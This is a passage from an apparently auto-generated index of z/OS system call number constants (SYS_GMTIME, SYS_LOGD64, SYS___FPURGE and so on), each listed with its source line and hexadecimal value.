SYS_GETS_UNLOCKED = 0xC7D constant SYS_GETTIMEOFDAY64 (line 218) | SYS_GETTIMEOFDAY64 = 0xD50 constant SYS_GETWCHAR_UNLOCKED (line 219) | SYS_GETWCHAR_UNLOCKED = 0xCBC constant SYS_GETWC_UNLOCKED (line 220) | SYS_GETWC_UNLOCKED = 0xCBB constant SYS_GMTIME (line 221) | SYS_GMTIME = 0x0B0 constant SYS_GMTIME64 (line 222) | SYS_GMTIME64 = 0xCDC constant SYS_GMTIME64_R (line 223) | SYS_GMTIME64_R = 0xCDD constant SYS_HYPOTD128 (line 224) | SYS_HYPOTD128 = 0xBD1 constant SYS_HYPOTD32 (line 225) | SYS_HYPOTD32 = 0xBCF constant SYS_HYPOTD64 (line 226) | SYS_HYPOTD64 = 0xBD0 constant SYS_ILOGBD128 (line 227) | SYS_ILOGBD128 = 0xBD4 constant SYS_ILOGBD32 (line 228) | SYS_ILOGBD32 = 0xBD2 constant SYS_ILOGBD64 (line 229) | SYS_ILOGBD64 = 0xBD3 constant SYS_ILOGBF (line 230) | SYS_ILOGBF = 0xA7E constant SYS_ILOGBL (line 231) | SYS_ILOGBL = 0xA81 constant SYS_INET6_IS_SRCADDR (line 232) | SYS_INET6_IS_SRCADDR = 0xD5A constant SYS_ISBLANK (line 233) | SYS_ISBLANK = 0x0FE constant SYS_ISWALNUM (line 234) | SYS_ISWALNUM = 0x0FF constant SYS_LDEXPD128 (line 235) | SYS_LDEXPD128 = 0xBD7 constant SYS_LDEXPD32 (line 236) | SYS_LDEXPD32 = 0xBD5 constant SYS_LDEXPD64 (line 237) | SYS_LDEXPD64 = 0xBD6 constant SYS_LGAMMAD128 (line 238) | SYS_LGAMMAD128 = 0xBDA constant SYS_LGAMMAD32 (line 239) | SYS_LGAMMAD32 = 0xBD8 constant SYS_LGAMMAD64 (line 240) | SYS_LGAMMAD64 = 0xBD9 constant SYS_LIO_LISTIO (line 241) | SYS_LIO_LISTIO = 0xC6A constant SYS_LLRINT (line 242) | SYS_LLRINT = 0xA84 constant SYS_LLRINTD128 (line 243) | SYS_LLRINTD128 = 0xBDD constant SYS_LLRINTD32 (line 244) | SYS_LLRINTD32 = 0xBDB constant SYS_LLRINTD64 (line 245) | SYS_LLRINTD64 = 0xBDC constant SYS_LLRINTF (line 246) | SYS_LLRINTF = 0xA87 constant SYS_LLRINTL (line 247) | SYS_LLRINTL = 0xA8A constant SYS_LLROUND (line 248) | SYS_LLROUND = 0xA8D constant SYS_LLROUNDD128 (line 249) | SYS_LLROUNDD128 = 0xBE0 constant SYS_LLROUNDD32 (line 250) | SYS_LLROUNDD32 = 0xBDE constant SYS_LLROUNDD64 (line 251) | SYS_LLROUNDD64 = 0xBDF constant SYS_LLROUNDF (line 252) | SYS_LLROUNDF = 0xA90 constant SYS_LLROUNDL (line 253) | SYS_LLROUNDL = 0xA93 constant SYS_LOCALTIM (line 254) | SYS_LOCALTIM = 0x0B1 constant SYS_LOCALTIME (line 255) | SYS_LOCALTIME = 0x0B1 constant SYS_LOCALTIME64 (line 256) | SYS_LOCALTIME64 = 0xCDE constant SYS_LOCALTIME64_R (line 257) | SYS_LOCALTIME64_R = 0xCDF constant SYS_LOG10D128 (line 258) | SYS_LOG10D128 = 0xBE6 constant SYS_LOG10D32 (line 259) | SYS_LOG10D32 = 0xBE4 constant SYS_LOG10D64 (line 260) | SYS_LOG10D64 = 0xBE5 constant SYS_LOG1PD128 (line 261) | SYS_LOG1PD128 = 0xBE9 constant SYS_LOG1PD32 (line 262) | SYS_LOG1PD32 = 0xBE7 constant SYS_LOG1PD64 (line 263) | SYS_LOG1PD64 = 0xBE8 constant SYS_LOG2D128 (line 264) | SYS_LOG2D128 = 0xBEC constant SYS_LOG2D32 (line 265) | SYS_LOG2D32 = 0xBEA constant SYS_LOG2D64 (line 266) | SYS_LOG2D64 = 0xBEB constant SYS_LOGBD128 (line 267) | SYS_LOGBD128 = 0xBEF constant SYS_LOGBD32 (line 268) | SYS_LOGBD32 = 0xBED constant SYS_LOGBD64 (line 269) | SYS_LOGBD64 = 0xBEE constant SYS_LOGBF (line 270) | SYS_LOGBF = 0xA96 constant SYS_LOGBL (line 271) | SYS_LOGBL = 0xA99 constant SYS_LOGD128 (line 272) | SYS_LOGD128 = 0xBE3 constant SYS_LOGD32 (line 273) | SYS_LOGD32 = 0xBE1 constant SYS_LOGD64 (line 274) | SYS_LOGD64 = 0xBE2 constant SYS_LRINT (line 275) | SYS_LRINT = 0xA9C constant SYS_LRINTD128 (line 276) | SYS_LRINTD128 = 0xBF2 constant SYS_LRINTD32 (line 277) | SYS_LRINTD32 = 0xBF0 constant SYS_LRINTD64 (line 278) | SYS_LRINTD64 = 0xBF1 constant SYS_LRINTF (line 279) | SYS_LRINTF = 0xA9F constant SYS_LRINTL (line 280) | SYS_LRINTL = 0xAA2 constant SYS_LROUNDD128 (line 281) | SYS_LROUNDD128 = 0xBF5 constant SYS_LROUNDD32 (line 282) | SYS_LROUNDD32 = 0xBF3 constant SYS_LROUNDD64 (line 283) | SYS_LROUNDD64 = 0xBF4 constant SYS_LROUNDL (line 284) | SYS_LROUNDL = 0xAA5 constant SYS_MBLEN (line 285) | SYS_MBLEN = 0x0AF constant SYS_MBRTOC16 (line 286) | SYS_MBRTOC16 = 0xD42 constant SYS_MBRTOC32 (line 287) | SYS_MBRTOC32 = 0xD43 constant SYS_MEMSET (line 288) | SYS_MEMSET = 0x0A3 constant SYS_MKTIME (line 289) | SYS_MKTIME = 0x0AC constant SYS_MKTIME64 (line 290) | SYS_MKTIME64 = 0xCE0 constant SYS_MODFD128 (line 291) | SYS_MODFD128 = 0xBF8 constant SYS_MODFD32 (line 292) | SYS_MODFD32 = 0xBF6 constant SYS_MODFD64 (line 293) | SYS_MODFD64 = 0xBF7 constant SYS_NAN (line 294) | SYS_NAN = 0xAA8 constant SYS_NAND128 (line 295) | SYS_NAND128 = 0xBFB constant SYS_NAND32 (line 296) | SYS_NAND32 = 0xBF9 constant SYS_NAND64 (line 297) | SYS_NAND64 = 0xBFA constant SYS_NANF (line 298) | SYS_NANF = 0xAAA constant SYS_NANL (line 299) | SYS_NANL = 0xAAC constant SYS_NEARBYINT (line 300) | SYS_NEARBYINT = 0xAAE constant SYS_NEARBYINTD128 (line 301) | SYS_NEARBYINTD128 = 0xBFE constant SYS_NEARBYINTD32 (line 302) | SYS_NEARBYINTD32 = 0xBFC constant SYS_NEARBYINTD64 (line 303) | SYS_NEARBYINTD64 = 0xBFD constant SYS_NEARBYINTF (line 304) | SYS_NEARBYINTF = 0xAB1 constant SYS_NEARBYINTL (line 305) | SYS_NEARBYINTL = 0xAB4 constant SYS_NEXTAFTERD128 (line 306) | SYS_NEXTAFTERD128 = 0xC01 constant SYS_NEXTAFTERD32 (line 307) | SYS_NEXTAFTERD32 = 0xBFF constant SYS_NEXTAFTERD64 (line 308) | SYS_NEXTAFTERD64 = 0xC00 constant SYS_NEXTAFTERF (line 309) | SYS_NEXTAFTERF = 0xAB7 constant SYS_NEXTAFTERL (line 310) | SYS_NEXTAFTERL = 0xABA constant SYS_NEXTTOWARD (line 311) | SYS_NEXTTOWARD = 0xABD constant SYS_NEXTTOWARDD128 (line 312) | SYS_NEXTTOWARDD128 = 0xC04 constant SYS_NEXTTOWARDD32 (line 313) | SYS_NEXTTOWARDD32 = 0xC02 constant SYS_NEXTTOWARDD64 (line 314) | SYS_NEXTTOWARDD64 = 0xC03 constant SYS_NEXTTOWARDF (line 315) | SYS_NEXTTOWARDF = 0xAC0 constant SYS_NEXTTOWARDL (line 316) | SYS_NEXTTOWARDL = 0xAC3 constant SYS_NL_LANGINFO (line 317) | SYS_NL_LANGINFO = 0x0FC constant SYS_PERROR_UNLOCKED (line 318) | SYS_PERROR_UNLOCKED = 0xCBD constant SYS_POSIX_FALLOCATE (line 319) | SYS_POSIX_FALLOCATE = 0xCE8 constant SYS_POSIX_MEMALIGN (line 320) | SYS_POSIX_MEMALIGN = 0xCE9 constant SYS_POSIX_OPENPT (line 321) | SYS_POSIX_OPENPT = 0xC66 constant SYS_POWD128 (line 322) | SYS_POWD128 = 0xC07 constant SYS_POWD32 (line 323) | SYS_POWD32 = 0xC05 constant SYS_POWD64 (line 324) | SYS_POWD64 = 0xC06 constant SYS_PRINTF_UNLOCKED (line 325) | SYS_PRINTF_UNLOCKED = 0xCBE constant SYS_PSELECT (line 326) | SYS_PSELECT = 0xC67 constant SYS_PTHREAD_ATTR_GETSTACK (line 327) | SYS_PTHREAD_ATTR_GETSTACK = 0xB3E constant SYS_PTHREAD_ATTR_SETSTACK (line 328) | SYS_PTHREAD_ATTR_SETSTACK = 0xB3F constant SYS_PTHREAD_SECURITY_APPLID_NP (line 329) | SYS_PTHREAD_SECURITY_APPLID_NP = 0xCE4 constant SYS_PUTS_UNLOCKED (line 330) | SYS_PUTS_UNLOCKED = 0xC7F constant SYS_PUTWCHAR_UNLOCKED (line 331) | SYS_PUTWCHAR_UNLOCKED = 0xCC0 constant SYS_PUTWC_UNLOCKED (line 332) | SYS_PUTWC_UNLOCKED = 0xCBF constant SYS_QUANTEXPD128 (line 333) | SYS_QUANTEXPD128 = 0xD46 constant SYS_QUANTEXPD32 (line 334) | SYS_QUANTEXPD32 = 0xD44 constant SYS_QUANTEXPD64 (line 335) | SYS_QUANTEXPD64 = 0xD45 constant SYS_QUANTIZED128 (line 336) | SYS_QUANTIZED128 = 0xC0A constant SYS_QUANTIZED32 (line 337) | SYS_QUANTIZED32 = 0xC08 constant SYS_QUANTIZED64 (line 338) | SYS_QUANTIZED64 = 0xC09 constant SYS_REMAINDERD128 (line 339) | SYS_REMAINDERD128 = 0xC0D constant SYS_REMAINDERD32 (line 340) | SYS_REMAINDERD32 = 0xC0B constant SYS_REMAINDERD64 (line 341) | SYS_REMAINDERD64 = 0xC0C constant SYS_RESIZE_ALLOC (line 342) | SYS_RESIZE_ALLOC = 0xCEB constant SYS_REWIND_UNLOCKED (line 343) | SYS_REWIND_UNLOCKED = 0xCC1 constant SYS_RINTD128 (line 344) | SYS_RINTD128 = 0xC13 constant SYS_RINTD32 (line 345) | SYS_RINTD32 = 0xC11 constant SYS_RINTD64 (line 346) | SYS_RINTD64 = 0xC12 constant SYS_RINTF (line 347) | SYS_RINTF = 0xACB constant SYS_RINTL (line 348) | SYS_RINTL = 0xACD constant SYS_ROUND (line 349) | SYS_ROUND = 0xACF constant SYS_ROUNDD128 (line 350) | SYS_ROUNDD128 = 0xC16 constant SYS_ROUNDD32 (line 351) | SYS_ROUNDD32 = 0xC14 constant SYS_ROUNDD64 (line 352) | SYS_ROUNDD64 = 0xC15 constant SYS_ROUNDF (line 353) | SYS_ROUNDF = 0xAD2 constant SYS_ROUNDL (line 354) | SYS_ROUNDL = 0xAD5 constant SYS_SAMEQUANTUMD128 (line 355) | SYS_SAMEQUANTUMD128 = 0xC19 constant SYS_SAMEQUANTUMD32 (line 356) | SYS_SAMEQUANTUMD32 = 0xC17 constant SYS_SAMEQUANTUMD64 (line 357) | SYS_SAMEQUANTUMD64 = 0xC18 constant SYS_SCALBLN (line 358) | SYS_SCALBLN = 0xAD8 constant SYS_SCALBLND128 (line 359) | SYS_SCALBLND128 = 0xC1C constant SYS_SCALBLND32 (line 360) | SYS_SCALBLND32 = 0xC1A constant SYS_SCALBLND64 (line 361) | SYS_SCALBLND64 = 0xC1B constant SYS_SCALBLNF (line 362) | SYS_SCALBLNF = 0xADB constant SYS_SCALBLNL (line 363) | SYS_SCALBLNL = 0xADE constant SYS_SCALBND128 (line 364) | SYS_SCALBND128 = 0xC1F constant SYS_SCALBND32 (line 365) | SYS_SCALBND32 = 0xC1D constant SYS_SCALBND64 (line 366) | SYS_SCALBND64 = 0xC1E constant SYS_SCALBNF (line 367) | SYS_SCALBNF = 0xAE3 constant SYS_SCALBNL (line 368) | SYS_SCALBNL = 0xAE6 constant SYS_SCANF_UNLOCKED (line 369) | SYS_SCANF_UNLOCKED = 0xCC2 constant SYS_SCHED_YIELD (line 370) | SYS_SCHED_YIELD = 0xB32 constant SYS_SETENV (line 371) | SYS_SETENV = 0x0C8 constant SYS_SETIPV4SOURCEFILTER (line 372) | SYS_SETIPV4SOURCEFILTER = 0xC76 constant SYS_SETSOURCEFILTER (line 373) | SYS_SETSOURCEFILTER = 0xC78 constant SYS_SHM_OPEN (line 374) | SYS_SHM_OPEN = 0xC8C constant SYS_SHM_UNLINK (line 375) | SYS_SHM_UNLINK = 0xC8D constant SYS_SIND128 (line 376) | SYS_SIND128 = 0xC22 constant SYS_SIND32 (line 377) | SYS_SIND32 = 0xC20 constant SYS_SIND64 (line 378) | SYS_SIND64 = 0xC21 constant SYS_SINHD128 (line 379) | SYS_SINHD128 = 0xC25 constant SYS_SINHD32 (line 380) | SYS_SINHD32 = 0xC23 constant SYS_SINHD64 (line 381) | SYS_SINHD64 = 0xC24 constant SYS_SIZEOF_ALLOC (line 382) | SYS_SIZEOF_ALLOC = 0xCEA constant SYS_SOCKATMARK (line 383) | SYS_SOCKATMARK = 0xC68 constant SYS_SQRTD128 (line 384) | SYS_SQRTD128 = 0xC28 constant SYS_SQRTD32 (line 385) | SYS_SQRTD32 = 0xC26 constant SYS_SQRTD64 (line 386) | SYS_SQRTD64 = 0xC27 constant SYS_STRCHR (line 387) | SYS_STRCHR = 0x0A0 constant SYS_STRCSPN (line 388) | SYS_STRCSPN = 0x0A1 constant SYS_STRERROR (line 389) | SYS_STRERROR = 0x0A8 constant SYS_STRERROR_R (line 390) | SYS_STRERROR_R = 0xB33 constant SYS_STRFTIME (line 391) | SYS_STRFTIME = 0x0B2 constant SYS_STRLEN (line 392) | SYS_STRLEN = 0x0A9 constant SYS_STRPBRK (line 393) | SYS_STRPBRK = 0x0A2 constant SYS_STRSPN (line 394) | SYS_STRSPN = 0x0A4 constant SYS_STRSTR (line 395) | SYS_STRSTR = 0x0A5 constant SYS_STRTOD128 (line 396) | SYS_STRTOD128 = 0xC2B constant SYS_STRTOD32 (line 397) | SYS_STRTOD32 = 0xC29 constant SYS_STRTOD64 (line 398) | SYS_STRTOD64 = 0xC2A constant SYS_STRTOK (line 399) | SYS_STRTOK = 0x0A6 constant SYS_TAND128 (line 400) | SYS_TAND128 = 0xC2E constant SYS_TAND32 (line 401) | SYS_TAND32 = 0xC2C constant SYS_TAND64 (line 402) | SYS_TAND64 = 0xC2D constant SYS_TANHD128 (line 403) | SYS_TANHD128 = 0xC31 constant SYS_TANHD32 (line 404) | SYS_TANHD32 = 0xC2F constant SYS_TANHD64 (line 405) | SYS_TANHD64 = 0xC30 constant SYS_TGAMMAD128 (line 406) | SYS_TGAMMAD128 = 0xC34 constant SYS_TGAMMAD32 (line 407) | SYS_TGAMMAD32 = 0xC32 constant SYS_TGAMMAD64 (line 408) | SYS_TGAMMAD64 = 0xC33 constant SYS_TIME (line 409) | SYS_TIME = 0x0AD constant SYS_TIME64 (line 410) | SYS_TIME64 = 0xCE1 constant SYS_TMPFILE64 (line 411) | SYS_TMPFILE64 = 0xD4D constant SYS_TMPFILE64_UNLOCKED (line 412) | SYS_TMPFILE64_UNLOCKED = 0xD4E constant SYS_TMPFILE_UNLOCKED (line 413) | SYS_TMPFILE_UNLOCKED = 0xCFD constant SYS_TRUNCD128 (line 414) | SYS_TRUNCD128 = 0xC40 constant SYS_TRUNCD32 (line 415) | SYS_TRUNCD32 = 0xC3E constant SYS_TRUNCD64 (line 416) | SYS_TRUNCD64 = 0xC3F constant SYS_UNGETC_UNLOCKED (line 417) | SYS_UNGETC_UNLOCKED = 0xCC3 constant SYS_UNGETWC_UNLOCKED (line 418) | SYS_UNGETWC_UNLOCKED = 0xCC4 constant SYS_UNSETENV (line 419) | SYS_UNSETENV = 0xB34 constant SYS_VFPRINTF_UNLOCKED (line 420) | SYS_VFPRINTF_UNLOCKED = 0xCC5 constant SYS_VFSCANF_UNLOCKED (line 421) | SYS_VFSCANF_UNLOCKED = 0xCC7 constant SYS_VFWPRINTF_UNLOCKED (line 422) | SYS_VFWPRINTF_UNLOCKED = 0xCC9 constant SYS_VFWSCANF_UNLOCKED (line 423) | SYS_VFWSCANF_UNLOCKED = 0xCCB constant SYS_VPRINTF_UNLOCKED (line 424) | SYS_VPRINTF_UNLOCKED = 0xCCD constant SYS_VSCANF_UNLOCKED (line 425) | SYS_VSCANF_UNLOCKED = 0xCCF constant SYS_VWPRINTF_UNLOCKED (line 426) | SYS_VWPRINTF_UNLOCKED = 0xCD1 constant SYS_VWSCANF_UNLOCKED (line 427) | SYS_VWSCANF_UNLOCKED = 0xCD3 constant SYS_WCSTOD128 (line 428) | SYS_WCSTOD128 = 0xC43 constant SYS_WCSTOD32 (line 429) | SYS_WCSTOD32 = 0xC41 constant SYS_WCSTOD64 (line 430) | SYS_WCSTOD64 = 0xC42 constant SYS_WPRINTF_UNLOCKED (line 431) | SYS_WPRINTF_UNLOCKED = 0xCD5 constant SYS_WSCANF_UNLOCKED (line 432) | SYS_WSCANF_UNLOCKED = 0xCD6 constant SYS__FLUSHLBF (line 433) | SYS__FLUSHLBF = 0xD68 constant SYS__FLUSHLBF_UNLOCKED (line 434) | SYS__FLUSHLBF_UNLOCKED = 0xD6F constant SYS___ACOSHF_H (line 435) | SYS___ACOSHF_H = 0xA54 constant SYS___ACOSHL_H (line 436) | SYS___ACOSHL_H = 0xA55 constant SYS___ASINHF_H (line 437) | SYS___ASINHF_H = 0xA56 constant SYS___ASINHL_H (line 438) | SYS___ASINHL_H = 0xA57 constant SYS___ATANPID128 (line 439) | SYS___ATANPID128 = 0xC6D constant SYS___ATANPID32 (line 440) | SYS___ATANPID32 = 0xC6B constant SYS___ATANPID64 (line 441) | SYS___ATANPID64 = 0xC6C constant SYS___CBRTF_H (line 442) | SYS___CBRTF_H = 0xA58 constant SYS___CBRTL_H (line 443) | SYS___CBRTL_H = 0xA59 constant SYS___CDUMP (line 444) | SYS___CDUMP = 0x0C4 constant SYS___CLASS (line 445) | SYS___CLASS = 0xAFA constant SYS___CLASS2 (line 446) | SYS___CLASS2 = 0xB99 constant SYS___CLASS2D128 (line 447) | SYS___CLASS2D128 = 0xC99 constant SYS___CLASS2D32 (line 448) | SYS___CLASS2D32 = 0xC97 constant SYS___CLASS2D64 (line 449) | SYS___CLASS2D64 = 0xC98 constant SYS___CLASS2F (line 450) | SYS___CLASS2F = 0xC91 constant SYS___CLASS2F_B (line 451) | SYS___CLASS2F_B = 0xC93 constant SYS___CLASS2F_H (line 452) | SYS___CLASS2F_H = 0xC94 constant SYS___CLASS2L (line 453) | SYS___CLASS2L = 0xC92 constant SYS___CLASS2L_B (line 454) | SYS___CLASS2L_B = 0xC95 constant SYS___CLASS2L_H (line 455) | SYS___CLASS2L_H = 0xC96 constant SYS___CLASS2_B (line 456) | SYS___CLASS2_B = 0xB9A constant SYS___CLASS2_H (line 457) | SYS___CLASS2_H = 0xB9B constant SYS___CLASS_B (line 458) | SYS___CLASS_B = 0xAFB constant SYS___CLASS_H (line 459) | SYS___CLASS_H = 0xAFC constant SYS___CLOGL_B (line 460) | SYS___CLOGL_B = 0xA01 constant SYS___CLOGL_H (line 461) | SYS___CLOGL_H = 0xA02 constant SYS___CLRENV (line 462) | SYS___CLRENV = 0x0C9 constant SYS___CLRMF (line 463) | SYS___CLRMF = 0x0BD constant SYS___CODEPAGE_INFO (line 464) | SYS___CODEPAGE_INFO = 0xC64 constant SYS___CONJF_B (line 465) | SYS___CONJF_B = 0xA07 constant SYS___CONJF_H (line 466) | SYS___CONJF_H = 0xA08 constant SYS___CONJL_B (line 467) | SYS___CONJL_B = 0xA0A constant SYS___CONJL_H (line 468) | SYS___CONJL_H = 0xA0B constant SYS___CONJ_B (line 469) | SYS___CONJ_B = 0xA04 constant SYS___CONJ_H (line 470) | SYS___CONJ_H = 0xA05 constant SYS___COPYSIGN_B (line 471) | SYS___COPYSIGN_B = 0xA5A constant SYS___COPYSIGN_H (line 472) | SYS___COPYSIGN_H = 0xAF5 constant SYS___COSPID128 (line 473) | SYS___COSPID128 = 0xC70 constant SYS___COSPID32 (line 474) | SYS___COSPID32 = 0xC6E constant SYS___COSPID64 (line 475) | SYS___COSPID64 = 0xC6F constant SYS___CPOWF_B (line 476) | SYS___CPOWF_B = 0xA10 constant SYS___CPOWF_H (line 477) | SYS___CPOWF_H = 0xA11 constant SYS___CPOWL_B (line 478) | SYS___CPOWL_B = 0xA13 constant SYS___CPOWL_H (line 479) | SYS___CPOWL_H = 0xA14 constant SYS___CPOW_B (line 480) | SYS___CPOW_B = 0xA0D constant SYS___CPOW_H (line 481) | SYS___CPOW_H = 0xA0E constant SYS___CPROJF_B (line 482) | SYS___CPROJF_B = 0xA19 constant SYS___CPROJF_H (line 483) | SYS___CPROJF_H = 0xA1A constant SYS___CPROJL_B (line 484) | SYS___CPROJL_B = 0xA1C constant SYS___CPROJL_H (line 485) | SYS___CPROJL_H = 0xA1D constant SYS___CPROJ_B (line 486) | SYS___CPROJ_B = 0xA16 constant SYS___CPROJ_H (line 487) | SYS___CPROJ_H = 0xA17 constant SYS___CREALF_B (line 488) | SYS___CREALF_B = 0xA22 constant SYS___CREALF_H (line 489) | SYS___CREALF_H = 0xA23 constant SYS___CREALL_B (line 490) | SYS___CREALL_B = 0xA25 constant SYS___CREALL_H (line 491) | SYS___CREALL_H = 0xA26 constant SYS___CREAL_B (line 492) | SYS___CREAL_B = 0xA1F constant SYS___CREAL_H (line 493) | SYS___CREAL_H = 0xA20 constant SYS___CSINF_B (line 494) | SYS___CSINF_B = 0xA2B constant SYS___CSINF_H (line 495) | SYS___CSINF_H = 0xA2C constant SYS___CSINHF_B (line 496) | SYS___CSINHF_B = 0xA34 constant SYS___CSINHF_H (line 497) | SYS___CSINHF_H = 0xA35 constant SYS___CSINHL_B (line 498) | SYS___CSINHL_B = 0xA37 constant SYS___CSINHL_H (line 499) | SYS___CSINHL_H = 0xA38 constant SYS___CSINH_B (line 500) | SYS___CSINH_B = 0xA31 constant SYS___CSINH_H (line 501) | SYS___CSINH_H = 0xA32 constant SYS___CSINL_B (line 502) | SYS___CSINL_B = 0xA2E constant SYS___CSINL_H (line 503) | SYS___CSINL_H = 0xA2F constant SYS___CSIN_B (line 504) | SYS___CSIN_B = 0xA28 constant SYS___CSIN_H (line 505) | SYS___CSIN_H = 0xA29 constant SYS___CSNAP (line 506) | SYS___CSNAP = 0x0C5 constant SYS___CSQRTF_B (line 507) | SYS___CSQRTF_B = 0xA3D constant SYS___CSQRTF_H (line 508) | SYS___CSQRTF_H = 0xA3E constant SYS___CSQRTL_B (line 509) | SYS___CSQRTL_B = 0xA40 constant SYS___CSQRTL_H (line 510) | SYS___CSQRTL_H = 0xA41 constant SYS___CSQRT_B (line 511) | SYS___CSQRT_B = 0xA3A constant SYS___CSQRT_H (line 512) | SYS___CSQRT_H = 0xA3B constant SYS___CTANF_B (line 513) | SYS___CTANF_B = 0xA46 constant SYS___CTANF_H (line 514) | SYS___CTANF_H = 0xA47 constant SYS___CTANHF_B (line 515) | SYS___CTANHF_B = 0xA4F constant SYS___CTANHF_H (line 516) | SYS___CTANHF_H = 0xA50 constant SYS___CTANHL_B (line 517) | SYS___CTANHL_B = 0xA52 constant SYS___CTANHL_H (line 518) | SYS___CTANHL_H = 0xA53 constant SYS___CTANH_B (line 519) | SYS___CTANH_B = 0xA4C constant SYS___CTANH_H (line 520) | SYS___CTANH_H = 0xA4D constant SYS___CTANL_B (line 521) | SYS___CTANL_B = 0xA49 constant SYS___CTANL_H (line 522) | SYS___CTANL_H = 0xA4A constant SYS___CTAN_B (line 523) | SYS___CTAN_B = 0xA43 constant SYS___CTAN_H (line 524) | SYS___CTAN_H = 0xA44 constant SYS___CTEST (line 525) | SYS___CTEST = 0x0C7 constant SYS___CTRACE (line 526) | SYS___CTRACE = 0x0C6 constant SYS___D1TOP (line 527) | SYS___D1TOP = 0xC9B constant SYS___D2TOP (line 528) | SYS___D2TOP = 0xC9C constant SYS___D4TOP (line 529) | SYS___D4TOP = 0xC9D constant SYS___DYNALL (line 530) | SYS___DYNALL = 0x0C3 constant SYS___DYNFRE (line 531) | SYS___DYNFRE = 0x0C2 constant SYS___EXP2F_H (line 532) | SYS___EXP2F_H = 0xA5E constant SYS___EXP2L_H (line 533) | SYS___EXP2L_H = 0xA5F constant SYS___EXP2_H (line 534) | SYS___EXP2_H = 0xA5D constant SYS___EXPM1F_H (line 535) | SYS___EXPM1F_H = 0xA5B constant SYS___EXPM1L_H (line 536) | SYS___EXPM1L_H = 0xA5C constant SYS___FBUFSIZE (line 537) | SYS___FBUFSIZE = 0xD60 constant SYS___FLBF (line 538) | SYS___FLBF = 0xD62 constant SYS___FLDATA (line 539) | SYS___FLDATA = 0x0C1 constant SYS___FMAF_B (line 540) | SYS___FMAF_B = 0xA67 constant SYS___FMAF_H (line 541) | SYS___FMAF_H = 0xA68 constant SYS___FMAL_B (line 542) | SYS___FMAL_B = 0xA6A constant SYS___FMAL_H (line 543) | SYS___FMAL_H = 0xA6B constant SYS___FMAXF_B (line 544) | SYS___FMAXF_B = 0xA70 constant SYS___FMAXF_H (line 545) | SYS___FMAXF_H = 0xA71 constant SYS___FMAXL_B (line 546) | SYS___FMAXL_B = 0xA73 constant SYS___FMAXL_H (line 547) | SYS___FMAXL_H = 0xA74 constant SYS___FMAX_B (line 548) | SYS___FMAX_B = 0xA6D constant SYS___FMAX_H (line 549) | SYS___FMAX_H = 0xA6E constant SYS___FMA_B (line 550) | SYS___FMA_B = 0xA64 constant SYS___FMA_H (line 551) | SYS___FMA_H = 0xA65 constant SYS___FMINF_B (line 552) | SYS___FMINF_B = 0xA79 constant SYS___FMINF_H (line 553) | SYS___FMINF_H = 0xA7A constant SYS___FMINL_B (line 554) | SYS___FMINL_B = 0xA7C constant SYS___FMINL_H (line 555) | SYS___FMINL_H = 0xA7D constant SYS___FMIN_B (line 556) | SYS___FMIN_B = 0xA76 constant SYS___FMIN_H (line 557) | SYS___FMIN_H = 0xA77 constant SYS___FPENDING (line 558) | SYS___FPENDING = 0xD61 constant SYS___FPENDING_UNLOCKED (line 559) | SYS___FPENDING_UNLOCKED = 0xD6C constant SYS___FPURGE (line 560) | SYS___FPURGE = 0xD69 constant SYS___FPURGE_UNLOCKED (line 561) | SYS___FPURGE_UNLOCKED = 0xD70 constant SYS___FP_CAST_D (line 562) | SYS___FP_CAST_D = 0xBCB constant SYS___FREADABLE (line 563) | SYS___FREADABLE = 0xD63 constant SYS___FREADAHEAD (line 564) | SYS___FREADAHEAD = 0xD6A constant SYS___FREADAHEAD_UNLOCKED (line 565) | SYS___FREADAHEAD_UNLOCKED = 0xD71 constant SYS___FREADING (line 566) | SYS___FREADING = 0xD65 constant SYS___FREADING_UNLOCKED (line 567) | SYS___FREADING_UNLOCKED = 0xD6D constant SYS___FSEEK2 (line 568) | SYS___FSEEK2 = 0xB3C constant SYS___FSETERR (line 569) | SYS___FSETERR = 0xD6B constant SYS___FSETLOCKING (line 570) | SYS___FSETLOCKING = 0xD67 constant SYS___FTCHEP (line 571) | SYS___FTCHEP = 0x0BF constant SYS___FTELL2 (line 572) | SYS___FTELL2 = 0xB3B constant SYS___FUPDT (line 573) | SYS___FUPDT = 0x0B5 constant SYS___FWRITABLE (line 574) | SYS___FWRITABLE = 0xD64 constant SYS___FWRITING (line 575) | SYS___FWRITING = 0xD66 constant SYS___FWRITING_UNLOCKED (line 576) | SYS___FWRITING_UNLOCKED = 0xD6E constant SYS___GETCB (line 577) | SYS___GETCB = 0x0B4 constant SYS___GETGRGID1 (line 578) | SYS___GETGRGID1 = 0xD5B constant SYS___GETGRNAM1 (line 579) | SYS___GETGRNAM1 = 0xD5C constant SYS___GETTHENT (line 580) | SYS___GETTHENT = 0xCE5 constant SYS___GETTOD (line 581) | SYS___GETTOD = 0xD3E constant SYS___HYPOTF_H (line 582) | SYS___HYPOTF_H = 0xAF6 constant SYS___HYPOTL_H (line 583) | SYS___HYPOTL_H = 0xAF7 constant SYS___ILOGBF_B (line 584) | SYS___ILOGBF_B = 0xA7F constant SYS___ILOGBF_H (line 585) | SYS___ILOGBF_H = 0xA80 constant SYS___ILOGBL_B (line 586) | SYS___ILOGBL_B = 0xA82 constant SYS___ILOGBL_H (line 587) | SYS___ILOGBL_H = 0xA83 constant SYS___ISBLANK_A (line 588) | SYS___ISBLANK_A = 0xB2E constant SYS___ISBLNK (line 589) | SYS___ISBLNK = 0x0FE constant SYS___ISWBLANK_A (line 590) | SYS___ISWBLANK_A = 0xB2F constant SYS___LE_CEEGTJS (line 591) | SYS___LE_CEEGTJS = 0xD72 constant SYS___LE_TRACEBACK (line 592) | SYS___LE_TRACEBACK = 0xB7A constant SYS___LGAMMAL_H (line 593) | SYS___LGAMMAL_H = 0xA62 constant SYS___LGAMMA_B_C99 (line 594) | SYS___LGAMMA_B_C99 = 0xB39 constant SYS___LGAMMA_H_C99 (line 595) | SYS___LGAMMA_H_C99 = 0xB38 constant SYS___LGAMMA_R_C99 (line 596) | SYS___LGAMMA_R_C99 = 0xB3A constant SYS___LLRINTF_B (line 597) | SYS___LLRINTF_B = 0xA88 constant SYS___LLRINTF_H (line 598) | SYS___LLRINTF_H = 0xA89 constant SYS___LLRINTL_B (line 599) | SYS___LLRINTL_B = 0xA8B constant SYS___LLRINTL_H (line 600) | SYS___LLRINTL_H = 0xA8C constant SYS___LLRINT_B (line 601) | SYS___LLRINT_B = 0xA85 constant SYS___LLRINT_H (line 602) | SYS___LLRINT_H = 0xA86 constant SYS___LLROUNDF_B (line 603) | SYS___LLROUNDF_B = 0xA91 constant SYS___LLROUNDF_H (line 604) | SYS___LLROUNDF_H = 0xA92 constant SYS___LLROUNDL_B (line 605) | 